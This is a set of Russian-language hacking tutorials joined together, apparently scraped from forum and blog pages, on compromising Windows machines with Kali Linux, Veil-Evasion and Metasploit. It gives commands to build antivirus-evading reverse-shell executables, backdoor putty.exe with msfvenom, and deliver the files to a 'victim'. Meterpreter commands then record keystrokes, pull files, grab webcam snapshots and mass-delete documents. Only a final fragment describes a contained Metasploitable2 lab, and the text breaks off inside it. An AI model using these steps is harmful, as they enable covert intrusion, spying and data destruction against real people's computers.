Статья Взлом удаленного компьютера, Veil-Evasion, Metasploit
Vander
CodebyTeam
В этой статье, будет подробно описан взлом удаленного компьютера с использованием Kali Linux, Veil-Evasion, Metasploit.
UPDATE:
Поддержка Veil-Evasion закончилась, рекомендуется использовать фреймворк Veil.
https://codeby.net/threads/veil-framework.60978/
Ниже представлена схема, по которой будет осуществляться проникновение.
Необходимые ресурсы:
1. Kali Linux (Я использовал Kali GNU/Linux Rolling)
2. Статический белый IP (В моем случае Kali находится за NAT роутера с статическим адресом. Подключение к нашей машине извне будут идти на 443 порт. (В роутере он проброшен на локальный адрес Kali.) Использующие динамический адрес могут использовать DyDNS. (Не пробовал, но должно работать)
3. Veil-Evasion – фреймворк, с помощью которого мы попытаемся обойти антивирус, создадим файл с полезной нагрузкой в формате .exe.
Для начала необходимо установить Veil-Evasion. Чтобы программа создавала корректно работающие файлы, не рекомендую установку apt-get install Veil-Evasion. Фреймворк нужно клонировать c github.com.
Выполните в терминале следующее:
Следим за установкой, соглашаемся и все устанавливаем.
Запускаем файл Veil-Evasion.py из терминала или из папки /root/Veil-Evasion.
Далее вводим команду list – она покажет список доступных payload.
Нас интересует номер 32 – python/meterpreter/reverse_https
Задаем опции будущему файлу, вводим последовательно следующие команды:
set LHOST 83.199.12.XXX (Ваш публичный IP)
set LPORT 443 (По умолчанию HTTPS URL использует 443 TCP-порт (для незащищённого HTTP — 80).
set USE_PYHERION Y (используем энкриптор)
generate (создаем .exe файл)
Вводим имя создаваемого файла.
Выбираем вторую строку, жмем 2.
Ждем успешной генерации файла.
Созданный файл любым путем доставляем на компьютер жертвы. Весит немного, стандартными антивирусами Win7, Win8.1, Win10 не определялся.
Выходим из Veil-Evasion.
Запускаем Metasploit.
#msfconsole
Когда файл на компьютере жертвы будет запущен, вы увидите что открылась сессия meterpreter>.
Сразу советую мигрировать в другой процесс т.к. файл могут удалить, процесс завершится и т.д.
Делается это так, вводим:
ps – отобразится список активных процессов. Находим , например, explorer, смотрим его PID.
migrate (PID процесса).
Migration completed successfully.
Успех. Теперь необходимо повысить права в системе, команда:
getsystem (срабатывает не всегда.)
В целом поможет разобраться стандартная команда help.
Ниже пару моментов которые помогут быстрее освоиться в системе.
1. Кейлоггер
meterpreter > bgrun keylogrecorder
[*] Executed Meterpreter with Job ID 2
meterpreter > [*] Starting the keystroke sniffer.
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.ххх.ххх_20111024.4455.txt #адрес лога
[*] Recording
meterpreter > bgkill 2 #отключаем кейлогер
[*] Killing background job 2.
2. Скрипт File_collector – позволит создавать список файлов имеющихся в определенном каталоге компьютера жертвы, редактировать его, и скачивать интересующие файлы себе.
Пример:
meterpreter > run file_collector -h
Затем создаем список файлов в одном каталоге:
run file_collector -r -d e:\\ -f * -o /root/ file.txt
Редактируем наш выходной файл, т.к. не все файлы нужны.
cat /root/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst
Скачиваем файлы на свой компьютер.
run file_collector -i /root /file.lst -l /root/
Полагаю не нужно обьяснять, что делают скрипты upload и download)
3. Используя скрипты scrapper и winenum можно собрать информацию о системе, которая сохранится на вашем локальном компьютере.
4. Удаление файлов. Команды вводятся в шелле.
Получаем его слудующим образом:
meterpreter >shell
Удаление файлов exe:
del e:\*.* /f /s /q
удаление файлов doc:
del e:\*.doc /f /s /q
удаление файлов pdf:
del e:\*.pdf /f /s /q
5. Командой приведенной ниже можно добавить payload в любой файл (определяется некоторыми антивирусами) При запуске на компьютере жертвы, откроется сессия meterpreter.
msfvenom -a x86 —platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 -e x86/shikata_ga_nai -i 3 -b «\x00» -f exe -o puttyX.exe
Краткое пояснение аргументов команды:
— a 86 — архитектура процессора.
—platform windows — тут понятно.
— x — указать пользовательский исполняемый файл для использования в качестве шаблона.
— k — сохранить поведение шаблона и ввести полезную нагрузку как новый поток.
— p — тип полезной нагрузки.
— e — тип енкодера.
— b — помечаем нулевой байт «плохим», то есть говорим, что его нужно избегать.
— f — формат выходного файла.
За пример взята putty находящаяся в директории /root.
LHOST и LPORT указываем свои.
Приведенный метод, хорошо справляется с взломом Win7, Win8, Win10, вопросы жду в комментариях. Если кто-то умеет криптовать файлы, интересно услышать его мнение.
Краткое руководство: Как взломать Windows с Kali Linux
Главное меню » Операционная система Linux » Краткое руководство: Как взломать Windows с Kali Linux
Детали исходной машины:
Целевая машина, используемая для взлома:
Шаг 1 . Создание нагрузки
Payload представляет собой программу, которая похожа как вирус или троян, которая выполняется на удаленной машине для цели взлома. Для создания полезной нагрузки используется команды написанные ниже, которые будут взламывать windows с Kali Linux.
С помощью команды ls мы подтвердили, что наша программа Payload успешно создана в указанном месте.
Шаг 2: Запустите команду mfsconsole, которая запустит запрос msf.
Шаг 3: Для использования мы использовали следующие детали:
- Порт 4444: вы можете использовать по вашему выбору
- LHOST IP: IP 192.168.189.128 с Kali Linux. Узнать IP, который использует ваша машина, можно с помощью команды Кали.
Теперь дайте следующую команду в строке msf “use exploit/multi/handler”
Затем дайте команду “set payload windows/meterpreter/reverse_tcp” в следующей строке:
Теперь установите локальный IP и порт, используя команду lhost и lport, как показано ниже:
и, наконец, используйте команду.
Теперь вам нужно выполнить команду “program.exe” на машине с Windows, как только она выполнится на целевой машине, вы можете в состоянии установить сессию meterpreter. Просто наберите SysInfo, чтобы получить детали взломанной машины с Windows.
После того как вы успешно получите детали, вы можете сделать больше в использовании или получить более подробную информацию с помощью команды “help“, которая покажет все варианты, с помощью которых вы можете взломать систему, например, вы можете выполнить команду веб-камера оснастки “webcam_snap” так же, как вы можете использовать многие доступные опции. Счастливого хакерства .
Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.
Взлом любого компьютера или использование Kali Linux
Наверное, уже тысячи статей и обучающих видео есть на тему Тестирования на проникновение с помощью средств ОС Kali Linux, но будет и моя статья в их числе. Это не полноценный гайд «как и че», а просто мини обзорчик, чтобы вы попробовали или узнали что-то новое.
План действий
- Настроить инфраструктуру.
- Определить доступные сервисы на исследуемой машине.
- Получить удалённый доступ, путем эксплуатации уязвимостей.
В ходе работы были использованы:
- Средство виртуализации – VirtualBox .
- Образ виртуальной машины для исследования – Metasploitable2 .
- Образ виртуальной машины атакующего – Kali Linux (ps: скачиваете образ для VB).
Ход работы
Адресация виртуальных машин следующая:
- · Kali Linux – 192.168.0.106/24 (чуть дальше у нее будет .102)
- · Metasloitable2 – 192.168.0.107/24 (чуть дальше у нее будет . 103)
Проверим доступность двух тачек:
Все отлично, машинки видят друг друга (у вас может быть другая ситуация, тогда обратите внимание на правила nftables/iptables), а значит можно приступать к сканированию Metasploitable. Для сканирования используем следующую команду:
nmap -sV 192.168.0.107 -p0-65535
Немного поясню, почему именно такая команда. Флаг sV (serviceVersion), как следует из полного наименования, необходим для получения сервисов, которые располагаются на портах + их версии, p0-65535 для сканирование всех возможных портов (некоторые сервисы могут скрывать на портах, которые им не предназначены и при обычном сканировании они не будут обнаружены).
Возьмем некоторые сервисы и поищем для них уязвимости.
Уязвимость №1
Использование уязвимости UnrealIRCd – open source IRC server, находящегося на портах 6667 и 6697. IRC — Internet Relay Chat.